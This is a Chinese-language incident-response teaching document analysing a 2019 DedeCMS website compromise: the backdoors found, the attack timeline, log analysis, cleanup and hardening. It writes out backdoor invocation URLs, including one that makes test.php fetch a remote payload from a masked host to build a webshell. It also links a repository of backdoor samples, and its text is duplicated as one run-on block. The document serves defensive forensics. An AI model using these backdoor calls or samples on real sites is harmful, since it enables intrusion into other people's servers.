网站应急响应实例分析与防御教学文档

事件概述

2019年10月，某网站被发现首页被百度提示存在非法篡改。通过百度快照确认网站首页确实被插入恶意代码，攻击者利用DedeCMS漏洞植入多个后门程序，包括PHP大马和隐藏的一句话木马。

攻击分析

1. 后门程序分析

1.1 test.php后门

路径：/plus/test.php
功能：远程下载并生成optimized.php大马
调用方式：http://xx.x.xx.xx:xxx/plus/test.php?id=http://xx.x.xx.xx:xxx/s/admine21.txt
生成文件：optimized.php（大马程序）
访问方式：访问optimized.php并输入密码即可登录

1.2 mytag_js.php后门

路径：/plus/mytag_js.php
关联文件：/Data/cache/mytag-511348.html（含有一句话木马）
攻击方式：
- 攻击者访问http://x.x.x.x//plus/mytag_js.php?aid=511348
- mytag_js.php包含并执行cache目录下对应的html文件中的PHP代码
特点：利用文件包含方式隐藏后门，绕过常规杀毒软件检测

1.3 其他后门

路径：/data/tplcache/目录下存在多个PHP一句话木马
时间追溯：最早可追溯到2017年

2. 攻击时间线

9月29日中午12:35:58 - 首次攻击（日志缺失部分记录）
10月6日 - 网站首页被篡改
攻击持续至被发现时

3. 攻击手法

利用DedeCMS V57_UTF8_SP2版本漏洞
采用多层后门植入策略：
- 初始攻击上传一句话木马
- 通过一句话木马上传更多功能齐全的后门
- 删除部分中间文件以隐藏攻击痕迹
利用缓存文件存储恶意代码，结合正常功能文件执行

应急响应步骤

1. 初步确认

检查百度快照确认篡改事实
查看网站管理后台确认篡改时间

2. 后门排查

检查/plus/目录下可疑文件：
- test.php
- mytag_js.php
- optimized.php
- ad_js.php
检查数据缓存目录：
- /Data/cache/目录下的html文件
- /data/tplcache/目录下的php文件
分析网站访问日志：
- 查找异常访问记录
- 关注状态码为200的POST请求
- 注意文件写入操作记录

3. 日志分析要点

查找文件写入记录：
- 关注包含eval、base64_decode等关键字的请求
- 注意解码后的实际内容
时间线分析：
- 确定首次攻击时间
- 追踪攻击者操作序列
注意日志缺失情况：
- 本案例中2019-09-29 11:08:32到2019-07-12 09:40:01之间的日志缺失

4. 环境验证

本地搭建测试环境验证后门功能
使用菜刀等工具测试一句话木马连通性
分析数据包大小判断攻击者操作

安全加固建议

1. 立即处置措施

删除已发现的后门程序：
- /plus/test.php
- /plus/optimized.php
- /plus/mytag_js.php
- /plus/ad_js.php
- /Data/cache/mytag-*.html
- /data/tplcache/下的可疑php文件
清理缓存目录：
- /Data/cache/
- /data/tplcache/
修改所有管理密码

2. 系统加固

升级DedeCMS到最新安全版本
限制目录权限：
- 禁止执行缓存目录中的php文件
- 设置合理的文件权限
文件监控：
- 对/plus/目录进行文件变更监控
- 对缓存目录进行内容监控
日志完善：
- 确保日志完整记录
- 定期备份和分析日志

3. 长期防护

Web应用防火墙部署
定期安全扫描
建立文件完整性校验机制
禁用危险函数：如eval、assert等
关闭不必要的文件包含功能

攻击手法总结

利用已知CMS漏洞获取初始访问权限
植入初级后门（一句话木马）
通过初级后门上传功能更完善的后门
利用系统正常功能隐藏恶意代码
清理部分攻击痕迹
建立持久化访问通道

防御要点

及时修补CMS已知漏洞
监控异常文件变更
重视缓存文件的安全风险
完善日志记录和分析
采用多层防御策略
定期进行安全审计

参考资源

后门样本：https://github.com/tide-emergency/yingji/tree/master/木马后门
Tide安全团队官网：http://www.TideSec.net

通过本案例可以看出，攻击者往往采用多种技术组合攻击，并注重攻击的隐蔽性和持久性。防御方需要建立完善的安全监控体系，及时发现并处置安全威胁，同时通过系统加固减少攻击面。

网站应急响应实例分析与防御教学文档事件概述 2019年10月，某网站被发现首页被百度提示存在非法篡改。通过百度快照确认网站首页确实被插入恶意代码，攻击者利用DedeCMS漏洞植入多个后门程序，包括PHP大马和隐藏的一句话木马。攻击分析 1. 后门程序分析 1.1 test.php后门路径：/plus/test.php 功能：远程下载并生成optimized.php大马调用方式： http://xx.x.xx.xx:xxx/plus/test.php?id=http://xx.x.xx.xx:xxx/s/admine21.txt 生成文件：optimized.php（大马程序）访问方式：访问optimized.php并输入密码即可登录 1.2 mytag_ js.php后门路径：/plus/mytag_ js.php 关联文件：/Data/cache/mytag-511348.html（含有一句话木马）攻击方式：攻击者访问 http://x.x.x.x//plus/mytag_js.php?aid=511348 mytag_ js.php包含并执行cache目录下对应的html文件中的PHP代码特点：利用文件包含方式隐藏后门，绕过常规杀毒软件检测 1.3 其他后门路径：/data/tplcache/目录下存在多个PHP一句话木马时间追溯：最早可追溯到2017年 2. 攻击时间线 9月29日中午12:35:58 - 首次攻击（日志缺失部分记录） 10月6日 - 网站首页被篡改攻击持续至被发现时 3. 攻击手法利用DedeCMS V57_ UTF8_ SP2版本漏洞采用多层后门植入策略：初始攻击上传一句话木马通过一句话木马上传更多功能齐全的后门删除部分中间文件以隐藏攻击痕迹利用缓存文件存储恶意代码，结合正常功能文件执行应急响应步骤 1. 初步确认检查百度快照确认篡改事实查看网站管理后台确认篡改时间 2. 后门排查检查/plus/目录下可疑文件： test.php mytag_ js.php optimized.php ad_ js.php 检查数据缓存目录： /Data/cache/目录下的html文件 /data/tplcache/目录下的php文件分析网站访问日志：查找异常访问记录关注状态码为200的POST请求注意文件写入操作记录 3. 日志分析要点查找文件写入记录：关注包含 eval 、 base64_decode 等关键字的请求注意解码后的实际内容时间线分析：确定首次攻击时间追踪攻击者操作序列注意日志缺失情况：本案例中2019-09-29 11:08:32到2019-07-12 09:40:01之间的日志缺失 4. 环境验证本地搭建测试环境验证后门功能使用菜刀等工具测试一句话木马连通性分析数据包大小判断攻击者操作安全加固建议 1. 立即处置措施删除已发现的后门程序： /plus/test.php /plus/optimized.php /plus/mytag_ js.php /plus/ad_ js.php /Data/cache/mytag-* .html /data/tplcache/下的可疑php文件清理缓存目录： /Data/cache/ /data/tplcache/ 修改所有管理密码 2. 系统加固升级DedeCMS到最新安全版本限制目录权限：禁止执行缓存目录中的php文件设置合理的文件权限文件监控：对/plus/目录进行文件变更监控对缓存目录进行内容监控日志完善：确保日志完整记录定期备份和分析日志 3. 长期防护 Web应用防火墙部署定期安全扫描建立文件完整性校验机制禁用危险函数：如eval、assert等关闭不必要的文件包含功能攻击手法总结利用已知CMS漏洞获取初始访问权限植入初级后门（一句话木马）通过初级后门上传功能更完善的后门利用系统正常功能隐藏恶意代码清理部分攻击痕迹建立持久化访问通道防御要点及时修补CMS已知漏洞监控异常文件变更重视缓存文件的安全风险完善日志记录和分析采用多层防御策略定期进行安全审计参考资源后门样本：https://github.com/tide-emergency/yingji/tree/master/木马后门 Tide安全团队官网：http://www.TideSec.net 通过本案例可以看出，攻击者往往采用多种技术组合攻击，并注重攻击的隐蔽性和持久性。防御方需要建立完善的安全监控体系，及时发现并处置安全威胁，同时通过系统加固减少攻击面。